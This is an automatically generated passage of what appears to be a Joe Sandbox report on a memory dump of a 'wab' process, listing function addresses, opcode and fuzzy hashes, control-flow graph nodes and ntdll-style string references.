                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 626033df740da5e7d3d28f009ce80bbeaf9f6018f0d37c6f10c105dfa7c1cd8c
                    • Instruction ID: 77f80b240aa150d61740ef17f4e728607230d7001bf46eea5934c3d8ec355ecd
                    • Opcode Fuzzy Hash: 626033df740da5e7d3d28f009ce80bbeaf9f6018f0d37c6f10c105dfa7c1cd8c
                    • Instruction Fuzzy Hash: 7E90026934140442E100715D4454B06100697E1705F55C065E1064514DC61ACE566226
                    Function 213B2F60 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e7e2d23677a7bdd314905ad83f62fcc9b175042148b78002e4ead717bd25a642
                    • Instruction ID: fda6c07d9339c89f83797d998d59e70b736b63b8db7959054aa382001fe0a7b2
                    • Opcode Fuzzy Hash: e7e2d23677a7bdd314905ad83f62fcc9b175042148b78002e4ead717bd25a642
                    • Instruction Fuzzy Hash: 0B90026921140042E104715D4444706104657E1605F55C062A2154514CC52A8E655225
                    Function 213B2FB0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a000520fef59b21739691afc2636522b7cb8af24a70af2badee7c83c2d4da9f9
                    • Instruction ID: aa48dde0612306a6bfa515fd1274561c754b4e866e656e50bfeef9eb370c468a
                    • Opcode Fuzzy Hash: a000520fef59b21739691afc2636522b7cb8af24a70af2badee7c83c2d4da9f9
                    • Instruction Fuzzy Hash: D5900229601400425140716D888490650067BE1615755C171A0998510DC55A8E695765
                    Function 213B2FA0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cbbd941aaa4190118441c6da622c539598e805f209bc24ed812c23768cd3ce2e
                    • Instruction ID: 424d48c83904c6a88f9caea7ee076e0500b92d133c49e9da55ef16b22032e4c3
                    • Opcode Fuzzy Hash: cbbd941aaa4190118441c6da622c539598e805f209bc24ed812c23768cd3ce2e
                    • Instruction Fuzzy Hash: A990023920180402E100715D4848747100657D0706F55C061A5164515EC666CE956631
                    Function 213B2F90 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4854f58fd535a55668d7459a6b3331b81aa14b48f163297803e8a5b65dd3066e
                    • Instruction ID: f04c902440a217419e2cbff9e221164669a5c1304b52fee02f72120d6d060266
                    • Opcode Fuzzy Hash: 4854f58fd535a55668d7459a6b3331b81aa14b48f163297803e8a5b65dd3066e
                    • Instruction Fuzzy Hash: A290023920180402E100715D485470B100657D0706F55C061A1164515DC6268E556671
                    Function 213B2FE0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ec755f9b542ed621c2a789bcd29f30f74a70c1b6d26af4a3774df63d365710e5
                    • Instruction ID: 7ce1744464816a7422cee56fe902b1ff5cddbb74f6d5a31b18e477e7bdb96ee2
                    • Opcode Fuzzy Hash: ec755f9b542ed621c2a789bcd29f30f74a70c1b6d26af4a3774df63d365710e5
                    • Instruction Fuzzy Hash: 90900229211C0042E200756D4C54B07100657D0707F55C165A0154514CC9168E655621
                    Function 213B2E30 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 34a953c3c57e4ee8a97aa2805683bbd26684d17a26ead0b0c74aeaf680acb0eb
                    • Instruction ID: 10371e42ce4f696a2b3489fec484a652f9983d6842fe0ccd0d8c52f9c31cf616
                    • Opcode Fuzzy Hash: 34a953c3c57e4ee8a97aa2805683bbd26684d17a26ead0b0c74aeaf680acb0eb
                    • Instruction Fuzzy Hash: 9B90022930140402E102715D4454606100A97D1749F95C062E1424515DC6268F57A232
                    Function 213B2EA0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ac71535a1e7a4a1493189f70232695576801c6658f4393a670afe864b7728d8f
                    • Instruction ID: 69fd4edb8504880d0f428222e0721580440dbbd14c434eab6e47e4b24cedb0c5
                    • Opcode Fuzzy Hash: ac71535a1e7a4a1493189f70232695576801c6658f4393a670afe864b7728d8f
                    • Instruction Fuzzy Hash: CB90027920140402E140715D4444746100657D0705F55C061A5064514EC65A8FD96765
                    Function 213B2E80 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 672ade48cea61ba19d4be9e6c2c28c937e3a9d911a6ee569d82fad11bbb3136b
                    • Instruction ID: a0c26260eab36e0373f4d970147141e1b5255e5db31cdd80d993d79f9e2adc8f
                    • Opcode Fuzzy Hash: 672ade48cea61ba19d4be9e6c2c28c937e3a9d911a6ee569d82fad11bbb3136b
                    • Instruction Fuzzy Hash: 2E90022960140502E101715D4444616100B57D0645F95C072A1024515ECA268F96A231
                    Function 213B2EE0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42eee7c7f5842fc1170e333e2751848afe130246cc0802dcb0524039d24df91f
                    • Instruction ID: e3cf561e25c97d4ed1f97c31ff1bf9881187909186f88a44899be2ef0fae60ad
                    • Opcode Fuzzy Hash: 42eee7c7f5842fc1170e333e2751848afe130246cc0802dcb0524039d24df91f
                    • Instruction Fuzzy Hash: AF90026920180403E140755D4844607100657D0706F55C061A2064515ECA2A8E556235
                    Function 213B3010 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 77b4a7394ab0dc6c1849fa5d7d370465456eb13a53529ed41f2ee56aa65f34a7
                    • Instruction ID: 502db3bae1fc4f453a50fd004e7314e476da70d7b480e0b4989f80da4fc9cb50
                    • Opcode Fuzzy Hash: 77b4a7394ab0dc6c1849fa5d7d370465456eb13a53529ed41f2ee56aa65f34a7
                    • Instruction Fuzzy Hash: 0A90022920184442E140725D4844B0F510657E1606F95C069A4156514CC9168E595721
                    Function 213B3090 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 862a9424f0e3daf90207218814c579337bafd71cff6180ccad4336cfeb3e1864
                    • Instruction ID: 9bacd4a4046667204d2de6a580eb7305b15df2f663ef47cfa39667879805a364
                    • Opcode Fuzzy Hash: 862a9424f0e3daf90207218814c579337bafd71cff6180ccad4336cfeb3e1864
                    • Instruction Fuzzy Hash: 0C90022924140802E140715D8454707100797D0A05F55C061A0024514DC6178F6967B1
                    Function 213B39B0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 85e37df0f627ee0fb14099a9fd67b5cef0934a6d76040b224b06255813dab784
                    • Instruction ID: d18a861e2749fe10effe082cdb04d9abc20f8da35c4925b79b76092ee0bea3a8
                    • Opcode Fuzzy Hash: 85e37df0f627ee0fb14099a9fd67b5cef0934a6d76040b224b06255813dab784
                    • Instruction Fuzzy Hash: 9090022924545102E150715D4444616500677E0605F55C071A0814554DC5568E596321
                    Function 213B3D10 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6a303c386777f80644e6cc5015caf5187cd37b240a9d3d3efe338afddf78a20
                    • Instruction ID: 87efd5d8280561982beda6aa782e00b8b2f186dd80b293854af842f7eb2e11aa
                    • Opcode Fuzzy Hash: e6a303c386777f80644e6cc5015caf5187cd37b240a9d3d3efe338afddf78a20
                    • Instruction Fuzzy Hash: 8B90023920240142A540725D5844A4E510657E1706B95D465A0015514CC9158E655321
                    Function 213B3D70 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c461c587a621390fc6f39bba402472d09ab3b98d5e609a374fcf6913f985d141
                    • Instruction ID: 807489c323340f2d9528f5698a795ce69c70d238f597375e8a7fa1b335f5dc6b
                    • Opcode Fuzzy Hash: c461c587a621390fc6f39bba402472d09ab3b98d5e609a374fcf6913f985d141
                    • Instruction Fuzzy Hash: A990023D20140402E510715D5844646104757D0705F55D461A0424518DC6558EA5A221
                    Function 213B2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction ID: 77c26850e36fefad3e2e3f81156db8bbd7a41e54b139ece395f6de75c1cf1f3d
                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction Fuzzy Hash:
                    Function 213B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 997 213b2890-213b28b3 998 213ea4bc-213ea4c0 997->998 999 213b28b9-213b28cc 997->999 998->999 1000 213ea4c6-213ea4ca 998->1000 1001 213b28ce-213b28d7 999->1001 1002 213b28dd-213b28df 999->1002 1000->999 1005 213ea4d0-213ea4d4 1000->1005 1001->1002 1003 213ea57e-213ea585 1001->1003 1004 213b28e1-213b28e5 1002->1004 1003->1002 1006 213b28eb-213b28fa 1004->1006 1007 213b2988-213b298e 1004->1007 1005->999 1008 213ea4da-213ea4de 1005->1008 1009 213ea58a-213ea58d 1006->1009 1010 213b2900-213b2905 1006->1010 1011 213b2908-213b290c 1007->1011 1008->999 1012 213ea4e4-213ea4eb 1008->1012 1009->1011 1010->1011 1011->1004 1013 213b290e-213b291b 1011->1013 1014 213ea4ed-213ea4f4 1012->1014 1015 213ea564-213ea56c 1012->1015 1016 213b2921 1013->1016 1017 213ea592-213ea599 1013->1017 1019 213ea50b 1014->1019 1020 213ea4f6-213ea4fe 1014->1020 1015->999 1018 213ea572-213ea576 1015->1018 1023 213b2924-213b2926 1016->1023 1025 213ea5a1-213ea5c9 call 213c0050 1017->1025 1018->999 1024 213ea57c call 213c0050 1018->1024 1022 213ea510-213ea536 call 213c0050 1019->1022 1020->999 1021 213ea504-213ea509 1020->1021 1021->1022 1037 213ea55d-213ea55f 1022->1037 1027 213b2928-213b292a 1023->1027 1028 213b2993-213b2995 1023->1028 1024->1037 1034 213b292c-213b292e 1027->1034 1035 213b2946-213b2966 call 213c0050 1027->1035 1028->1027 1032 213b2997-213b29b1 call 213c0050 1028->1032 1046 213b2969-213b2974 1032->1046 1034->1035 1040 213b2930-213b2944 call 213c0050 1034->1040 1035->1046 1043 213b2981-213b2985 1037->1043 1040->1035 1046->1023 1048 213b2976-213b2979 1046->1048 1048->1025 1049 213b297f 1048->1049 1049->1043
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                    • API String ID: 48624451-2108815105
                    • Opcode ID: 66a0deaea1ae836677fdef64d8830cde7c3fffab335a661596e26846cd1db223
                    • Instruction ID: 79f1c6a80d3c3af634ae9c3a54129d7b391fd28677117f6d52005d64e42134b5
                    • Opcode Fuzzy Hash: 66a0deaea1ae836677fdef64d8830cde7c3fffab335a661596e26846cd1db223
                    • Instruction Fuzzy Hash: 2E51ECB6A00156BFC711DF98889097EFBBEBF492487108269F4A9D7645E334EF5087D0
                    Function 21422410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1050 21422410-21422433 1051 21422439-2142243d 1050->1051 1052 214224ec-214224ff 1050->1052 1051->1052 1053 21422443-21422447 1051->1053 1054 21422513-21422515 1052->1054 1055 21422501-2142250a 1052->1055 1053->1052 1056 2142244d-21422451 1053->1056 1058 21422517-2142251b 1054->1058 1055->1054 1057 2142250c 1055->1057 1056->1052 1059 21422457-2142245b 1056->1059 1057->1054 1060 21422538-2142253e 1058->1060 1061 2142251d-2142252c 1058->1061 1059->1052 1062 21422461-21422468 1059->1062 1065 21422543-21422547 1060->1065 1063 21422540 1061->1063 1064 2142252e-21422536 1061->1064 1066 214224b6-214224be 1062->1066 1067 2142246a-21422471 1062->1067 1063->1065 1064->1065 1065->1058 1068 21422549-21422556 1065->1068 1066->1052 1073 214224c0-214224c4 1066->1073 1069 21422473-2142247b 1067->1069 1070 21422484 1067->1070 1071 21422564 1068->1071 1072 21422558-21422562 1068->1072 1069->1052 1074 2142247d-21422482 1069->1074 1075 21422489-214224ab call 213c0510 1070->1075 1076 21422567-21422569 1071->1076 1072->1076 1073->1052 1077 214224c6-214224ea call 213c0510 1073->1077 1074->1075 1088 214224ae-214224b1 1075->1088 1078 2142256b-2142256d 1076->1078 1079 2142258d-2142258f 1076->1079 1077->1088 1078->1079 1082 2142256f-2142258b call 213c0510 1078->1082 1084 21422591-21422593 1079->1084 1085 214225ae-214225d0 call 213c0510 1079->1085 1095 214225d3-214225df 1082->1095 1084->1085 1089 21422595-214225ab call 213c0510 1084->1089 1085->1095 1094 21422615-21422619 1088->1094 1089->1085 1095->1076 1097 214225e1-214225e4 1095->1097 1098 21422613 1097->1098 1099 214225e6-21422610 call 213c0510 1097->1099 1098->1094 1099->1098
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                    • API String ID: 48624451-2108815105
                    • Opcode ID: 4143f9958e36c64f6e15b0969260d648436f96b4f1433a7dcba58ae7570826f0
                    • Instruction ID: 320dca819d7e8e1b6c95739dbe320c2115d3dc28d7cac0ee71b67411ebb2a732
                    • Opcode Fuzzy Hash: 4143f9958e36c64f6e15b0969260d648436f96b4f1433a7dcba58ae7570826f0
                    • Instruction Fuzzy Hash: D1510475A00A86AFDB21CE9CC990D7FBBFDAF45204B008469E89ED7745E674DB80C760
                    Function 213A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1306 213a7630-213a7651 1307 213a768b-213a7699 call 213b4c30 1306->1307 1308 213a7653-213a766f call 2137e660 1306->1308 1313 213e4638 1308->1313 1314 213a7675-213a7682 1308->1314 1317 213e463f-213e4645 1313->1317 1315 213a769a-213a76a9 call 213a7818 1314->1315 1316 213a7684 1314->1316 1324 213a76ab-213a76c1 call 213a77cd 1315->1324 1325 213a7701-213a770a 1315->1325 1316->1307 1319 213e464b-213e46b8 call 213ff290 call 213b9020 BaseQueryModuleData 1317->1319 1320 213a76c7-213a76d0 call 213a7728 1317->1320 1319->1320 1343 213e46be-213e46c6 1319->1343 1320->1325 1331 213a76d2 1320->1331 1324->1317 1324->1320 1329 213a76d8-213a76e1 1325->1329 1333 213a770c-213a770e 1329->1333 1334 213a76e3-213a76f2 call 213a771b 1329->1334 1331->1329 1337 213a76f4-213a76f6 1333->1337 1334->1337 1339 213a76f8-213a76fa 1337->1339 1340 213a7710-213a7719 1337->1340 1339->1316 1342 213a76fc 1339->1342 1340->1339 1344 213e47be-213e47d0 call 213b2c50 1342->1344 1343->1320 1346 213e46cc-213e46d3 1343->1346 1344->1316 1346->1320 1348 213e46d9-213e46e4 1346->1348 1349 213e46ea-213e4723 call 213ff290 call 213baaa0 1348->1349 1350 213e47b9 call 213b4d48 1348->1350 1356 213e473b-213e476b call 213ff290 1349->1356 1357 213e4725-213e4736 call 213ff290 1349->1357 1350->1344 1356->1320 1362 213e4771-213e477f call 213ba770 1356->1362 1357->1325 1365 213e4786-213e47a3 call 213ff290 call 213ecf9e 1362->1365 1366 213e4781-213e4783 1362->1366 1365->1320 1371 213e47a9-213e47b2 1365->1371 1366->1365 1371->1362 1372 213e47b4 1371->1372 1372->1320
                    Strings
                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 213E4725
                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 213E46FC
                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 213E4655
                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 213E4742
                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 213E4787
                    • ExecuteOptions, xrefs: 213E46A0
                    • Execute=1, xrefs: 213E4713
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                    • API String ID: 0-484625025
                    • Opcode ID: 72d7ee65ace59f37bd25f67e9496e96afd3bb8840ebfe3e3dced3cc97a192853
                    • Instruction ID: 957b3fd267f39da08e70f525d2859b2b517089d4fff9f2cbfcb11416c14fa1e3
                    • Opcode Fuzzy Hash: 72d7ee65ace59f37bd25f67e9496e96afd3bb8840ebfe3e3dced3cc97a192853
                    • Instruction Fuzzy Hash: 895119316002197EEB119FA8DCD9FE977BEEF1931CF0000A9D609A7191EB729A418F50
                    Function 213BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: __aulldvrm
                    • String ID: +$-$0$0
                    • API String ID: 1302938615-699404926
                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                    • Instruction ID: 416aa110065da787059ed771e2ae778ec2d10c53219a0f6c3ec50102953a8095
                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                    • Instruction Fuzzy Hash: 1B81E570E012498EEB25CF68C851BEEBFB7AF46368F14411ED851A7A89EF308B40C751
                    Function 2139F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                    Download Yara Rule
                    Strings
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 213E02BD
